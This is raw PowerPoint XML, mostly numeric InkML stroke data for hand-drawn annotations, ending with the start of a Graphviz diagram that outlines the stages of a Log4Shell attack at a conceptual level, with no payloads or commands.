  <inkml:trace contextRef="#ctx0" brushRef="#br0">482 455 24575,'1'-2'0,"0"0"0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0 0,4-1 0,32-16 0,-22 14 0,1 1 0,-1 0 0,0 1 0,1 0 0,18 2 0,-15 0 0,-1-1 0,1-1 0,22-5 0,6-2 0,1 3 0,-1 2 0,1 2 0,67 5 0,-13-1 0,237-2 0,-318-1 0,0-2 0,38-7 0,-36 5 0,0 1 0,27-2 0,508 5 0,-269 3 0,1009-2 0,-1270-2 0,0 0 0,33-8 0,-30 4 0,47-3 0,51 11 0,52-4 0,-93-11 0,-58 7 0,50-3 0,-26 8 0,-5 1 0,1-3 0,51-9 0,-63 7 0,1 1 0,67 3 0,21-1 0,-46-12 0,-55 9 0,37-4 0,41-5 0,-69 8 0,52-3 0,-11 9 0,-43 1 0,0-1 0,0-2 0,45-7 0,-12-1-151,-1 3-1,1 2 1,98 8-1,-45-1 29,485-2-489,-566-2 796,61-11 0,-60 7 240,57-3 1,1594 9-300,-784 2-126,-905-2 1,36-1-157,0 2 0,0 1 0,59 12 0,-53-7 30,0-1 0,0-3 1,0-2-1,47-4 0,4 1-6,-57 2 133,0 3 0,58 10 0,-33-4 0,0-4 0,125-5 0,-74-3 0,-14 2 499,112 3 265,-124 12-619,-56-9-151,49 4-1,425-8-641,-242-2-403,-224 2 1051,64 13 0,-61-8 0,45 3 0,539-8-6,-303-3 119,-296 2 23,47-1-431,0 4 0,75 12 0,-75-7 317,0-2 0,111-7 0,-65-1-18,4142 2 2267,-4241 1-2271,1 1 0,36 9 0,-35-6 0,0-1 0,27 2 0,509-5 8,-270-3-147,2635 2-1602,-2900-1 1768,0-2 0,36-7 1,-35 4 8,50-3 1,479 8 690,-268 3-458,509-2-1911,-759-2 1425,61-10-1,-58 5 114,45-1-1,43 10 105,56-4 0,-100-11 0,-54 7 0,40-3 0,29 9 922,19-2 296,-49-11-805,-50 9-262,-1 0 1,21-1-1,21 3-151,-26 1 0,-1-1 0,52-11 0,-40 7 0,0 0 0,0 3 0,86 5 0,-36 1 0,442-3-580,-508-2 580,0-1 0,33-7 0,-30 4 0,47-2 0,-24 7 0,-5 0 0,0-1 0,53-10 0,-40 4 52,1 2 0,122 6-1,-72 3 374,-69-3-425,-11 1 0,-1-1 0,0-2 0,47-9 0,-36 4-105,1 2-1,-1 2 0,68 3 1,49-2-123,-73-12 228,-58 8 0,53-3 0,107 10 0,73-3 0,-175-11 269,-56 7-78,49-2-1,82 9-190,70-3 0,-164-11 0,-50 9 0,0 0 0,21-1 0,321 2 0,-184 5 0,247-2 0,-402 1 0,0 2 0,38 7 0,-36-4 0,0-2 0,26 1 0,245-5 0,-135-1 0,-141 2 0,-1 1 0,1 1 0,20 5 0,-17-3 0,37 4 0,-31-6 0,37 9 0,-40-7 0,1-1 0,31 2 0,59-7 0,52 2 0,-160 0 0,-1 0 0,1 0 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 1 0,-1 0 0,1 0 0,0 0 0,-1 1 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1 0 0,-1 0 0,6 8 0,2 7 0,0 0 0,-2 0 0,15 43 0,-16-40 0,-4-8 0,0 1 0,-2 0 0,1 0 0,-2 1 0,1 22 0,-5 87 0,-1-47 0,4-4 0,-3 75 0,0-133 0,-2-1 0,0 1 0,-1 0 0,-7 17 0,5-18 0,1 1 0,1 0 0,-5 29 0,7 28 0,4-55 0,-2 1 0,0-1 0,-8 36 0,-41 97 0,4-12 0,38-116 0,-15 31 0,-3 9 0,23-53 0,-1 1 0,-1 0 0,0-1 0,0 0 0,-12 16 0,14-23 0,-1 1 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 0 0,0-1 0,0 1 0,-1-1 0,1-1 0,-6 2 0,-9 3 0,0 0 0,0 1 0,-31 17 0,-26 11 0,50-24 0,-48 28 0,63-31 0,-1-1 0,0 0 0,0 0 0,-1-1 0,0-1 0,-16 5 0,-3-2 0,12-2 0,0-1 0,0-2 0,-24 3 0,23-4 0,0 1 0,1 1 0,-1 1 0,-31 12 0,13-4 0,5-4 0,-41 4 0,30-5 0,-50 4 0,-16 4 0,18-4 0,72-10 0,1 0 0,0 1 0,-1 1 0,2 1 0,-22 8 0,25-7 0,0 0 0,1-2 0,-2 0 0,1-1 0,-19 1 0,-90-2 0,86-3 0,-1 2 0,-44 7 0,34 0-589,-94 19-13,118-22 633,0-2 1,-50 2-1,46-5-576,-49 9 0,32-3 754,-76 2 0,38-5-235,-22 11-432,66-7 372,-58 1 1,-463-9 2509,541 2-2424,1 1 0,-37 9 0,35-6 0,-1-1 0,-25 2 0,-509-5-684,268-3-230,172 0 914,-130 5 0,160 10 0,58-7 0,-50 3 0,-309-9 717,185-1-446,178 2-158,-1 2 0,-31 7 0,27-4 22,-35 1 1,-108-7-595,-37 2-156,124 11 615,57-7 0,-50 3 0,-303-9-784,183-1 489,164 3 207,-60 10 1,59-5 9,-47 1 0,-329-8-836,195-1 608,196 2 415,1 1-1,-39 9 1,36-5-145,-42 3 0,-51-8-400,71-2 715,0 1 0,-67 11 0,23 1-225,0-5-1,-149-7 0,100-2 1834,68 1-1816,-83 3 860,86 11-931,50-8 0,1-2 0,-22 3 0,-322-4 5,186-4-105,-2873 2-2203,3020-1 2303,0-2 0,-33-7 0,31 4 0,-49-2 0,-78-6 0,-26-1 0,180 15 0,-49 1 516,0-2 0,-93-15 0,85 7-282,0 4 0,0 2 1,-71 6-1,18-1-321,23-1 87,-102-3 0,105-11 0,56 7 0,-49-3 0,62 9 0,-15-1 0,0 0 0,-63-13 0,52 7-4,1 2-1,-1 2 1,-87 5 0,37 0-483,45-1 392,25 0 94,0 0 0,0-2 0,0-1-1,-45-9 1,41 5 68,1 1 0,-1 2 0,1 1 0,-35 1 0,30 1 23,0-1 0,-54-9 0,-68-10-90,26 5 0,-42-14-599,138 24 533,-61-1 1,62 6 69,0-2-1,-35-7 1,-93-13-4,52 10 0,43 5 0,-2 4 0,-65 4 0,-76-3 0,98-15 734,49 6-749,-2-1 15,39 7 0,0 0 0,-38-1 0,-274 5 0,150 3 0,153-4 0,-61-11 0,58 7 0,-45-2 0,-511 7-591,286 3 372,272-4 219,-62-11 0,57 7 0,-39-2 0,-336 6-1434,212 3 956,180-2 749,0-1 0,-38-9 0,36 6 365,0 1 1,-27-1-1,-508 3-636,269 4 0,-1434-2-940,1695 2 940,1 0 0,-34 9 0,31-6 0,-48 4 0,60-9-1,-14 1-7,1 0 0,0 2 0,-38 9 0,-99 18 8,141-26 0,-42 3 0,40-5 0,-32 7 0,-7 0 231,-1-2 0,1-3 1,-87-6-1,34 0-183,-332 2-823,424 1 775,0 2 0,-30 7 0,27-4 0,-49 2 0,-14-9 0,57 0 0,0 0 0,-1 3 0,-57 10 0,58-6 0,0-1 0,-56-1 0,17-1 0,-17 10 343,61-7-127,-44 2 0,47-7-216,-18 0 0,0 2 0,-51 9 0,65-7 0,0-1 0,-38-2 0,39-1 0,0 0 0,-44 9 0,7 1 0,-1-4 0,0-3 0,-96-7 0,38 1 0,58 1 0,17 0 0,0 1 0,-82 13 0,-114 22-911,-31 5-245,199-28 1156,49-6-239,-50 3 0,34-8 222,1 2 1,-52 10 0,69-9 1,-63 2 0,22-3 200,3 10 719,51-9-642,-38 5 0,-29-9 54,62-1-177,0 0 0,-1 2 0,1 1 0,-41 8 0,37-3-139,-1-2 0,-1-1 0,-36 1 0,-90-6 0,53-2 0,-801 3 0,881-1 0,1-1 0,-37-9 0,35 6 0,0 1 0,-27-1 0,30 4 0,-13 1 0,0-2 0,-62-12 0,42 1 0,0 3 0,-1 2 0,-85-2 0,108 10 0,0 0 0,0-2 0,-57-12 0,66 9 0,-141-30 0,106 23 0,37 7 0,0 1 0,-26-2 0,20 3 0,-1-1 0,1-1 0,-30-11 0,27 8 0,-1 1 0,-31-4 0,41 8 0,0-1 0,0-1 0,1 0 0,-31-14 0,-71-40 0,109 52 0,1-1 0,0 0 0,-19-18 0,19 16 0,0 0 0,-1 1 0,-16-10 0,-5-2 0,-50-40 0,69 49 0,4 5 0,2-1 0,-1-1 0,1 1 0,0-1 0,1-1 0,0 1 0,0-1 0,1 0 0,0-1 0,1 0 0,0 0 0,-4-16 0,3 4 0,2-1 0,0 0 0,1 0 0,2 0 0,1-26 0,1-291 0,2 314 0,0 0 0,1 0 0,2 0 0,18-50 0,-15 53 0,1 2 0,16-27 0,-17 34 0,-1 1 0,-1-1 0,0 0 0,-1-1 0,0 0 0,-1 1 0,3-23 0,-8 36-33,8-40 190,-7 39-250,0 1 0,0 0 0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0 0,0 1 0,0-1 0,0 1 0,3-2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8:00.403"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">675 0 24575,'0'4'0,"0"0"0,0 0 0,0 0 0,-1 1 0,1-1 0,-1 0 0,0 0 0,0 0 0,0 0 0,-1-1 0,0 1 0,1 0 0,-1-1 0,0 1 0,-1-1 0,1 1 0,-1-1 0,1 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1 1 0,0-1 0,-1 0 0,-4 3 0,-278 183 0,269-178 0,-1-1 0,-32 11 0,-21 10 0,63-25 0,1 1 0,-1 0 0,1 0 0,1 1 0,-1 0 0,1 0 0,0 0 0,-9 16 0,11-16 0,0-1 0,0 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,0-1 0,-1 0 0,1-1 0,-1 1 0,0-1 0,-1 0 0,1-1 0,-8 4 0,12-7 0,1 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-3 2 0,4-3 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,0 1 0,0-1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 0 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,46 14 0,-30-10 0,107 41 0,-92-35 0,0 1 0,0 2 0,37 21 0,-57-28 0,1 0 0,1-2 0,-1 1 0,0-1 0,17 2 0,-12-2 0,1 0 0,17 8 0,102 53 0,-137-64 8,0-1-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,1 1 1,-1-1-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,2-1-1,-3 0-42,1 1-1,-1 0 1,0-1 0,0 1-1,1 0 1,-1-1 0,0 1-1,0 0 1,0-1 0,0 1-1,0-1 1,0 1 0,0 0-1,0-1 1,0 1 0,0-1-1,0 1 1,0 0 0,0-1-1,0 1 1,0-1 0,0 1-1,0 0 1,0-1 0,0 1-1,-1-1 1,1 1 0,0 0-1,0-1 1,0 1 0,-1 0-1,1-1 1,0 1 0,0 0-1,-1 0 1,1-1 0,0 1-1,-1 0 1,1 0 0,0-1-1,-1 1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8:02.301"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">314 626 24575,'26'0'0,"4"1"0,41-6 0,-61 4 0,-1-1 0,1 0 0,-1-1 0,0 0 0,0 0 0,0-1 0,-1 0 0,13-8 0,0-1 0,-2-1 0,1-2 0,29-30 0,-42 38 0,0 0 0,0-1 0,-2 0 0,1-1 0,-1 1 0,0-1 0,-1 0 0,0 0 0,-1 0 0,0-1 0,2-10 0,-3 8 0,0 1 0,0-1 0,-1 1 0,-1-1 0,0 0 0,-1 1 0,0-1 0,-1 1 0,-1-1 0,0 1 0,0 0 0,-1 0 0,-1 0 0,0 1 0,0-1 0,-1 1 0,-1 0 0,0 1 0,0 0 0,-13-14 0,14 17 0,1 1 0,1-2 0,-1 1 0,-3-9 0,7 12 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-4 0 0,-19-1 0,1 1 0,-1 1 0,-35 4 0,7-1 0,41-1 0,0-1 0,-1 2 0,1 0 0,0 1 0,0 0 0,0 1 0,0 1 0,-13 6 0,20-7 0,-1 0 0,0 0 0,1 1 0,0 1 0,0-1 0,1 1 0,0 0 0,0 1 0,0-1 0,1 1 0,0 0 0,0 0 0,0 1 0,-4 11 0,2-6 0,0-1 0,0 0 0,-17 20 0,18-25 0,0 0 0,0 1 0,1-1 0,0 1 0,0 0 0,1 1 0,0-1 0,0 1 0,1 0 0,1 0 0,-4 14 0,5-7 0,-1 0 0,2 1 0,0-1 0,1 0 0,1 0 0,1 1 0,0-1 0,1-1 0,0 1 0,2 0 0,11 24 0,38 75 0,-27-72 0,-18-28 0,0-1 0,-2 2 0,10 19 0,-14-25 0,1 0 0,0 0 0,0-1 0,1 0 0,0 0 0,1-1 0,0 1 0,1-1 0,11 9 0,0-2 0,0 0 0,2-2 0,22 12 0,18 11 0,-32-19 0,32 16 0,-49-28 0,-1-1 0,1 0 0,-1-1 0,1 0 0,0 0 0,21 0 0,1-2-74,-18-1-184,-1 0 0,1 2-1,-1-1 1,19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8:03.510"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 0 24575,'4'0'0,"1"1"0,-1-1 0,0 0 0,0 1 0,1 0 0,-1 0 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 1 0,0 0 0,0 0 0,0 0 0,6 7 0,-1 3 0,0 0 0,0 0 0,-1 1 0,6 20 0,-7-20 0,0 1 0,1-1 0,12 19 0,-4-11 0,-2 1 0,-1 0 0,0 1 0,8 27 0,-7-17 0,21 38 0,-25-56 0,-1 2 0,-1-1 0,-1 1 0,0 0 0,-1 1 0,3 21 0,-4-5 0,-1 1 0,-2 45 0,-3-104 0,0 0 0,-7-27 0,2 15 0,-3-50 0,9 74 0,1 0 0,0 0 0,1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,1 0 0,1 1 0,0-1 0,0 1 0,1 0 0,1 0 0,11-16 0,3 0 0,-15 18 0,1 1 0,0 0 0,0 0 0,0 0 0,1 1 0,0 0 0,0 0 0,16-9 0,-4 5 0,-1-1 0,0-1 0,-1-1 0,32-29 0,-40 34 16,0 1-1,1 0 0,0 0 1,19-9-1,7-4-1457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6:27.203"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1734 1924 24575,'0'-12'0,"-1"-1"0,0 0 0,-1 1 0,0-1 0,-1 1 0,0-1 0,-1 1 0,-1 0 0,0 1 0,0-1 0,-1 1 0,-1 0 0,-15-20 0,-173-254 0,183 268 0,-1 0 0,-27-27 0,-12-15 0,-5-4 0,38 44 0,-22-30 0,36 42 0,0 0 0,0-1 0,1 1 0,0-1 0,1 0 0,0 0 0,0-1 0,-2-11 0,-2-6 0,-2 0 0,0 0 0,-2 0 0,0 2 0,-2-1 0,-18-26 0,4 5 0,22 39 0,0 0 0,0 0 0,-1 0 0,-10-9 0,12 13 0,0-1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,0-1 0,1 0 0,-1 0 0,1 0 0,0 0 0,-2-9 0,1-5 0,-2-1 0,0 1 0,-1 0 0,-1 0 0,-1 1 0,-10-18 0,-3-3 0,12 22 0,0 0 0,-2 0 0,0 0 0,-25-28 0,24 31 0,2 1 0,0-1 0,0-1 0,1 0 0,1 0 0,1 0 0,0-1 0,1 0 0,-5-20 0,-10-23 0,15 44 0,-2 1 0,-16-25 0,-6-11 0,27 44 0,-1-2 0,1-1 0,-2 1 0,1 0 0,-1 1 0,0-1 0,-1 1 0,0 0 0,-11-11 0,16 18 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,-1 1 0,1-1 0,0 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0 0 0,1 0 0,-1 0 0,1 0 0,-1 1 0,-24 40 0,21-32 0,-103 157 0,74-119 0,-17 23 0,-76 80 0,98-119 0,2 1 0,-23 37 0,41-58 0,-1-1 0,-1 0 0,-13 13 0,-14 16 0,23-24 0,9-11 0,1-1 0,0 1 0,0 0 0,1 0 0,-1 1 0,1-1 0,-3 9 0,6-14-1,0 0-1,0 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 0,0 0 1,0 0-1,0 1 0,0-1 1,1 0-1,-1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 0,0 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 0,0 1 1,11-2 164,10-8-1626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6:28.014"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 104 24575,'0'-1'0,"1"-1"0,-1 1 0,1 0 0,-1 0 0,1 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0 0 0,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,2 0 0,44-5 0,-42 4 0,168-17 0,-20-12 0,-119 24 66,47-3 0,17-3-1563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09.246"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">1 1 24575,'2'0'0,"-1"1"0,1 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,-1-1 0,0 1 0,0-1 0,1 1 0,-1 0 0,-1-1 0,3 4 0,14 33 0,-8-15 0,1 1 0,17 28 0,-5-8 0,-17-33 0,0 1 0,1-1 0,0-1 0,0 1 0,16 17 0,-16-19 0,0 0 0,0 1 0,-1-1 0,0 1 0,-1 1 0,0-1 0,0 0 0,-1 1 0,3 21 0,12 34 0,7-2 0,26 77 0,-46-129 0,0 1 0,1-1 0,9 14 0,10 25 0,-5-3 0,-8-22 0,-2 1 0,9 37 0,9 49 0,-25-100 0,1 0 0,1-1 0,0 1 0,7 11 0,-5-10 0,-1-1 0,9 26 0,-1 10 0,38 89 0,-46-122 0,-1-1 0,6 28 0,-8-27 0,1-1 0,9 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10.563"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 165 24575,'8'2'0,"-1"-1"0,1 1 0,0 0 0,-1 1 0,0 0 0,0 0 0,0 0 0,0 1 0,0 0 0,12 10 0,1 0 0,6 3 0,37 35 0,8 6 0,-35-30 0,-1 3 0,54 60 0,-7-6 0,-81-84 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,1 0 0,-1 1 0,0-1 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,2 0 0,0-2 0,0 0 0,-1-1 0,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,-1 1 0,3-8 0,69-153 0,-56 131 0,-13 26 0,0 1 0,0-1 0,1 1 0,6-7 0,-6 8 0,0 0 0,-1-1 0,0 0 0,0 0 0,5-10 0,-1-5 0,-1-1 0,6-36 0,-11 43 0,1 1 0,0-1 0,1 1 0,0 0 0,1 1 0,1-1 0,0 1 0,1 0 0,10-14 0,-5 11-1365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13.007"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">710 1 24575,'-341'0'0,"314"2"0,1 1 0,-1 1 0,1 2 0,1 1 0,-30 11 0,45-15 0,1 1 0,0 1 0,0-1 0,0 1 0,0 1 0,1 0 0,0 0 0,0 1 0,1 0 0,-1 0 0,2 0 0,-1 1 0,1 0 0,0 1 0,1-1 0,0 1 0,0 0 0,-4 12 0,2-7 0,1 0 0,0 1 0,2 0 0,-1 0 0,2 0 0,0 1 0,1-1 0,-1 26 0,2 0 0,5 144 0,-3-180 0,-1-1 0,1 0 0,1 0 0,-1 1 0,1-1 0,0 0 0,-1-1 0,2 1 0,-1 0 0,0 0 0,1-1 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0-1 0,1 1 0,0-1 0,6 4 0,7 3 0,2-1 0,-1-1 0,26 6 0,-12-3 0,-16-4 0,10 3 0,0-1 0,0 0 0,1-2 0,34 3 0,-43-8-227,0 1-1,0 1 1,0 0-1,-1 2 1,32 11-1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1:57:14.347"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.2" units="cm"/>
      <inkml:brushProperty name="height" value="0.2" units="cm"/>
      <inkml:brushProperty name="color" value="#E71224"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">0 311 24575,'2'1'0,"0"0"0,0 0 0,0 0 0,-1-1 0,1 2 0,0-1 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0 0 0,0-1 0,1 5 0,16 31 0,-1 37 0,-14-55 0,0-1 0,11 29 0,-12-41 0,1 0 0,0 0 0,0 0 0,0-1 0,1 0 0,0 1 0,0-1 0,0 0 0,0-1 0,1 1 0,8 5 0,-2-2 0,0-2 0,0 0 0,1 0 0,-1-1 0,1 0 0,1-1 0,-1 0 0,16 2 0,-19-5 0,1 1 0,0-2 0,0 1 0,0-1 0,0-1 0,-1 1 0,1-2 0,0 1 0,-1-2 0,1 1 0,12-6 0,-16 4 0,0 0 0,0-1 0,0 0 0,-1 0 0,1-1 0,-1 1 0,0-1 0,-1 0 0,0-1 0,6-10 0,17-22 0,-16 25 0,-1 0 0,-1-1 0,0 0 0,-1 0 0,0-1 0,-2 0 0,0 0 0,0-1 0,5-30 0,-6 17 0,-2 0 0,-1-1 0,-1 1 0,-5-52 0,3 77 0,1-1 0,-1 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-1 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,0 1 0,0 0 0,0 1 0,0-1 0,0 1 0,0 0 0,-10-1 0,-61-11 0,57 9 0,0 0 0,-1 2 0,1 0 0,-25 1 0,41 1-105,0 0 0,0 1 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 1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9F616-DA34-47AE-9587-0A53904A1794}"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FFCAB-4F71-4364-B479-A88DA389FC0C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77688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digraph Log4ShellAttack {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>rankdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>=LR;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  node [shape=box];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>  subgraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>cluster_steps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    label="Log4Shell Attack Steps";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    color=black;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    style=dotted;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>VulnerableSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="1. Identify\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nVulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> System"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ExploitVulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="2. Exploit\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nVulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ProcessPayload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="3. Process\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nMalicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> Payload"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>RemoteCodeExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="4. Remote Code\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nExecution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>PrivilegeEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> [label="5. Privilege\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>nEscalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>ExfiltrationOrExploitation</a:t>
